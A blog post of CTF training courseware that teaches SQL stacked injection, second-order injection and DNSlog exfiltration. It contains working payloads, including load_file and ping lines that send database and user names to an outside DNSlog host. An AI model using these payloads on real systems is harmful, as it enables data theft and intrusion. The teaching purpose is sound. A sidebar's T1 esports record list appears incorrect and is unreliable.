河南省高校联盟战队课件6(sql-堆叠注入,二次注入,dnslog)

已于 2022-05-08 11:32:14 修改
阅读量2.1k 收藏 1
点赞数 3
分类专栏: 河南省高校联盟课件 文章标签: web安全
于 2022-04-22 13:36:22 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kui576/article/details/124340516
版权 
										堆叠注入,二次注入,dnslog

个人介绍

id:故事 普通的web喵

详细视频

堆叠注入,二次注入,dnslog
1、数据库堆叠注入(有条件的)

根据数据库类型决定是否支持多条语句执行
在这里插入图片描述
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-W1asHMtZ-1650596342581)(D:\software\Typora\courseware\河南高校联盟课件\SQL注入课件\image\image-20220420222917075.png)]

例题:堆叠注入-数据库类型&强网杯2019随便注
支持堆叠数据库类型:MYSQL MSSQL Postgresql等

';show databases;
';show tables;
';show columns from `1919810931114514`;
';select flag from `1919810931114514`;
';SeT @a=0x73656c656374202a2066726f6d20603139313938313039333131313435313460;prepare execsql from @a;execute execsql;

16进制编码MySQL可以识别
在这里插入图片描述

2、数据库二次注入
在这里插入图片描述
二次注入理解:写入的时候没有问题(一次注入)(没生效但写入数据库中了)
取出的时候与语句拼接发生问题(二次注入)(从数据库中调用了我们写入的SQL语句且没相应的过滤)

二次注入例题:

  1. CTF-[网鼎杯2018]Unfinish-黑盒(getflag.py)

找到/register.php 页面
注册用户:
邮箱,用户名,密码

登录:
邮箱,密码

进入个人中心:显示个人的用户名
select username from user where email=‘用户名’
(也就是说他从数据库中调用了我们输入的用户名)
(那如果用户名的注入语句呢???)

在这里插入图片描述

  1. CMS-74CMS个人会员中心

http://127.0.0.1/74cms/
注入点:学校名称
xxxx’,address=user()#
地址:123
insert address value(‘123’)
insert address value(‘’,user()#')

爆出版本号:
xxxx’,address=version()#
在这里插入图片描述在这里插入图片描述

xxxx’,address=user()#
在这里插入图片描述
在这里插入图片描述

  1. 以前做过的一个案例:

网站有创建用户修改用户的功能

目标:搞到flag admin用户
注册账号:admin’#(让语句写入数据库)(一次注入)
INSERT INTO user VALUES (‘admin’#',‘xxxxxx’)

当语句被取出:
这样我们尝试修改admin’#账号是不是可以修改到admin
语句拼接:
UPDATE user SET password = ‘aaaa’ WHERE username = ‘admin’#’

3、数据库Dnslog注入

解决不回显(反向连接),SQL注入,命令执行,SSRF等

  1. 平台
    dnslog平台
  2. 应用场景:
    解决不回显,反向连接,SQL注入,命令执行,SSRF等

SQL注入(案例):
select load_file(concat(‘\\’,(select database()),‘.xbozer.dnslog.cn\aa’));
and (select load_file(concat(‘//’,(select database()),‘.xbozer.dnslog.cn/abc’)))

在这里插入图片描述

命令执行(案例):
ping %USERNAME%.xbozer.dnslog.cn

在这里插入图片描述

有学习交流的可以加Q群:622816049

kui954
关注
  • 3
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
84.网络安全渗透测试—[SQL注入篇23]—[高级注入技巧-dnslog无回显注入]
qwsn
01-21 4338
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、高级注入技巧 dnslog无回显注入 1、原理 2、dnslog平台 3、MySQL dnslog无回显注入示例: 4、SQLSERVER dnslog无回显注入示例: 5、总结:
SQL注入(二次,DNSlog,堆叠注入)
qi_SJQ_的博客
11-11 1113
加解密: 最常见的就是base64编码,url编码等等,这些都得熟悉。 比如:cookie处加解密,需要自己去还原并相应地加密payload; 二次注入: 在黑盒测试以及工具中几乎发现不了,拿到源码后代码审计的话才可以发现,因为根本不知到第一次插入什么数据才可以导致二次调用时成功注入。 可以在Less-24实战: 修改密码页面sql源码: UPDATE users SET PASSWORD='$pass' where username='$username' and password='$...
SQL注入-堆叠注入
jokerhappy的博客
07-26 507
堆叠注入定义 Stacked injections(堆叠注入)从名词的含义就可以看到应该是一堆 sql 语句(多条)一起执行。而在真实的运用中也是这样的, 我们知道在 mysql 中, 主要是命令行中, 每一条语句结尾加; 表示语句结束。这样我们就想到了是不是可以多句一起使用。这个叫做 stacked injection。 堆叠注入原理: 在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入。而un
mysql堆叠注入条件,SQL注入堆叠注入(堆查询注入
weixin_39945816的博客
03-23 630
Stached injection -- 堆叠注入0x00 堆叠注入的定义​ Stackedinjection 汉语翻译过来后,称 为堆查询注入,也有称之为堆叠注入堆叠注入为攻击者提供了不少的攻击手段,经过添加一个新的查询或者终止查询,能够达到修改数据和调用存储过程的目的。前端0x01 堆叠注入的原理​ 在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下咱们在;结束一个sql语...
SQL注入堆叠注入
Devil_ping的博客
02-10 899
堆叠注入又叫多语句注入,就是原本只执行一个sql句,用函数让他可以执行多个sql语句 mysqli_query这个函数 只能执行一个sql语句 mysqli_multi_query这个函数 支持执行多个sql语句 例如select 1,2,3;select 4,5,6 ?id=1' ; select"<?php phpinfo();?>"into outfile"...
河南省网络安全高校战队联盟CTF训练营-web文件上传第一期
04-22
"河南省网络安全高校战队联盟CTF训练营-web文件上传第一期" 这个标题揭示了本次训练的主题,主要聚焦于网络安全领域中的一项重要技能——Web文件上传漏洞的利用与防御。CTF(Capture The Flag)是网络安全竞赛的一种...
超能陆战队英语PPT课件.pptx
10-09
他的设计灵感来自于Hiro的哥哥Tadashi,后者在一次意外中去世,这对Hiro来说是一次巨大的打击。然而,Baymax的出现给Hiro带来了安慰,成为他的个人健康伴侣。Baymax的程序来源于Tadashi制作的健康护理芯片,使其具备...
橙色高亮设计游戏战队俱乐部css模板-黑色 橙色 高亮 设计 游戏 战队 俱乐部 博客 html5.rar
11-12
对于游戏战队俱乐部而言,一个独特且引人注目的网站设计是吸引粉丝、增强品牌形象的关键。本篇将围绕“橙色高亮设计游戏战队俱乐部CSS模板”这一主题,深入探讨其设计理念以及HTML5技术的运用。 首先,我们来看标题...
react-基于react实现的守望先锋玩家提供组队战队交流的信息平台
08-15
为了满足玩家们的需求,开发者们利用React这一强大的JavaScript库构建了一个专为守望先锋玩家提供组队、战队组建以及交流的信息平台。本文将深入探讨如何利用React的特性来实现这样一个功能丰富的应用。 1. **React...
sql注入--7堆叠注入
技术骨干小李的博客
07-25 195
将语句堆叠在一起进行查询。在数据库中;代表结束符,那么堆叠注入主要就是多条sql语句一起执行。
SQL注入之简单了解堆叠注入
weixin_44257023的博客
08-23 467
SQL注入之简单了解堆叠注入
dnslogsql注入中的应用
whatday的专栏
07-23 700
目录 1.DNSLOG的原理 2.Dnslog在常见数据库中SQL注入的实战 1、MySQL 2、msSQL 3、postgreSQL 4、Oracle 3.总结 1.DNSLOG的原理 DNS的解析是递归与迭代相结合的,下面给出了当我们访问www.cloudcrowd.com.cn时, DNS的解析过程示意图 其中,红色部分是可控的。我们只需要搭建一个红色部分的DNS服务器,并将要盲打或盲注的回显,放到自己域名的二级甚至三级域名上去请求,就可以通过DNS解析日志来获取到它们。
SQL注入WebShell&&DNSlog注入(配合盲注)
weixin_51339377的博客
03-22 503
SQL注入webshell 1.什么是一句话木马 一句话木马是一种短小但是功能完善的木马客户端,通过它我们可以构造系统命令执行,从而 达到控制操作系统的目的。它的隐蔽性好,功能强大。一般来说渗透过程中遵从先传小马,再传 大马的逻辑。 我们把恶意的函数写入到文件里去,通过访问文件,搭建平台会执行文件中的参数,而这个文 件可以被我们利用来执行操作,从而达到了控制目标操作系统的目的。 方法1: 有三个条件: 1.首先需要知道远程目录(猜测+经验) 可以通过@@basedir 查询...
网安之web攻防第三十天
B_l_a_nk的博客
03-31 269
1、数据库堆叠注入 根据数据库类型决定是否支持多条语句执行 2、数据库二次注入 应用功能逻辑涉及上导致的先写入后组合的注入 3、数据库Dnslog注入 解决不回显(反向连接),SQL注入,命令执行,SSRF等 4、黑盒模式分析以上 二次注入:插入后调用显示操作符合 堆叠注入:判断注入后直接调多条执行 DNS注入:在注入上没太大利用价值,其他还行
巧用DNSlog实现无回显注入
weixin_30335575的博客
12-16 1073
测试一些网站的时候,一些注入都是无回显的,我们可以写脚本来进行盲注,但有些网站会ban掉我们的ip,这样我们可以通过设置ip代理池解决, 但是盲注往往效率很低,所以产生了DNSlog注入。具体原理如下。 首先需要有一个可以配置的域名,比如:ceye.io,然后通过代理商设置域名 ceye.io 的 nameserver 为自己的服务器 A,然后再服务器 A 上配置好 DNS Serv...
DnslogSQL注入中的实战
Hq_Dream的博客
01-20 3024
DnslogSQL注入中的实战 本文主要讲述Dnslog这种攻击手法在SQL注入中的实战运用,虽然网上对于DnslogSQL注入方面运用的文章也不少。但是很多文章都只是片面的提到了这个攻击方式,或者只是用某个简单的payload做了简单的验证。 本文主要讲述Dnslog这种攻击手法在SQL注入中的实战运用,虽然网上对于DnslogSQL注入方面运用的文章也不少。但是很多文章都只是片面的提到了...
DnslogSQL注入 & 四种数据库
3569
03-07 2814
https://www.anquanke.com/post/id/98096 mysql http://127.0.0.1/mysql.php?id=1 union select 1,2,load_file(CONCAT('\\',(SELECT hex(pass) FROM test.test_user WHERE name='admin' LIMIT 1),'.mysql.nk4...
concat拼接的坑 mysql_DNSlog注入踩坑记录:
weixin_39963465的博客
12-28 275
我遇到了两个巨坑,加上http://ceye.io/,经常无法访问,记录一下心酸的踩坑历史。直接将两个巨坑放到最前面,提醒后人!! 1. sql盲注,后端数据库用的mysql数据库,说一下用dnslog回显只能用于windows系统,原理就是''代表Microsoft Windows通用命名约定(UNC)的文件和目录路径格式利用任何以下扩展存储程序引发DNS地址解析。双斜杠表示网络资源路径多加两个...
DnslogSQL注入中的利用
weixin_33754913的博客
07-11 313
参考文献:www.anquanke.com/post/id/98096https://bbs.pediy.com/thread-223881.htm DNSlogWeb攻击的利用 在某些无法直接利用漏洞获得回显的情况下,但是目标可以发起DNS请求,这个时候就可以通过DNSlog把想获得的数据外带出来。 常用...
用html做一个英雄联盟战队T1介绍的网页
最新发布
05-24
好的,下面是一个简单的英雄联盟战队T1介绍的网页的HTML代码: ```html <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>T1战队介绍</title> <style> body { font-family: Arial, sans-serif; margin: 0; padding: 0; } header { background-color: #000; color: #fff; padding: 20px; } h1 { margin: 0; } nav { background-color: #f2f2f2; padding: 10px; } nav ul { list-style: none; margin: 0; padding: 0; } nav li { display: inline-block; margin-right: 20px; } nav a { color: #000; text-decoration: none; font-weight: bold; font-size: 16px; } nav a:hover { color: #f00; } section { padding: 20px; margin: 20px; border: 1px solid #ccc; border-radius: 5px; } footer { background-color: #000; color: #fff; padding: 20px; text-align: center; } footer p { margin: 0; } </style> </head> <body> <header> <h1>T1战队介绍</h1> </header> <nav> <ul> <li><a href="#">首页</a></li> <li><a href="#">战队成员</a></li> <li><a href="#">比赛记录</a></li> <li><a href="#">荣誉成就</a></li> <li><a href="#">联系我们</a></li> </ul> </nav> <section> <h2>战队简介</h2> <p>T1是一支韩国电子竞技战队,成立于2002年。战队在英雄联盟、星际争霸、守望先锋等多个游戏领域都有着出色的表现。</p> <h2>战队成员</h2> <p>T1战队的成员包括:</p> <ul> <li>Faker</li> <li>Effort</li> <li>Cuzz</li> <li>Gumayusi</li> <li>Canna</li> </ul> <h2>比赛记录</h2> <p>T1战队在英雄联盟赛场上有着辉煌的战绩:</p> <ul> <li>2013 LCK Summer - 冠军</li> <li>2014 LCK Spring - 冠军</li> <li>2015 LCK Spring - 冠军</li> <li>2015 MSI - 冠军</li> <li>2015 Worlds - 亚军</li> <li>2016 LCK Spring - 冠军</li> <li>2016 MSI - 冠军</li> <li>2016 Worlds - 亚军</li> <li>2019 LCK Summer - 冠军</li> <li>2019 Worlds - 亚军</li> </ul> <h2>荣誉成就</h2> <p>T1战队的荣誉成就包括:</p> <ul> <li>2013、2014、2015、2016年季后赛MVP</li> <li>2015年全球总决赛MVP</li> <li>2016年全球总决赛Best Mid Laner</li> <li>2019年LCK夏季赛MVP</li> </ul> <h2>联系我们</h2> <p>如果您有任何问题或建议,请通过以下方式联系我们:</p> <ul> <li>电话:+82-2-333-2222</li> <li>邮箱:info@t1.gg</li> <li>地址:韩国首尔市江南区三成路122号</li> </ul> </section> <footer> <p>© T1战队 2021</p> </footer> </body> </html> ``` 这个网页分为头部、导航、主体和底部四个部分。头部包括网页标题和页眉,导航包括几个链接,主体则是战队的介绍、成员、比赛记录、荣誉成就和联系方式,底部是版权声明。这只是一个简单的例子,你可以根据需要添加更多的内容和样式。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

kui954

感谢各位的支持o(* ̄3 ̄)o

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值